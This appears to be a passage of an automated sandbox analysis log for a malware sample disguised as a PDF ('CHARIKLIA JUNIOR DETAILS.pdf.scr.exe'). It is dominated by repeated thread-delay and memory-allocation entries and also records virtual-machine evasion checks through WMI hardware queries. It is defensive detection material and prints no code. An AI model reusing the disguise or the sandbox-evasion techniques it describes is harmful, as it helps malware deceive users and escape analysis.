                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7492, type: MEMORYSTR
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 1150000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 1320000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 7B40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 8B40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 8CF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 9CF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 1670000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598999Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598547Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598437Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597866Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597745Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597640Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597528Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597308Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597203Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597094Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596984Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596875Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596766Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596547Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596437Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596328Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596219Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596107Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595891Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595344Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5910Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3782Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWindow / User API: threadDelayed 2688Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWindow / User API: threadDelayed 7160Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep count: 38 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8008Thread sleep count: 2688 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8008Thread sleep count: 7160 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599327s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598999s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598093s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597866s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597745s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597528s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597308s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596107s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598999Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598547Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598437Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597866Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597745Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597640Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597528Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597308Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597203Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597094Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596984Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596875Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596766Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596547Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596437Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596328Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596219Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596107Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595891Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595453Jump to behavior
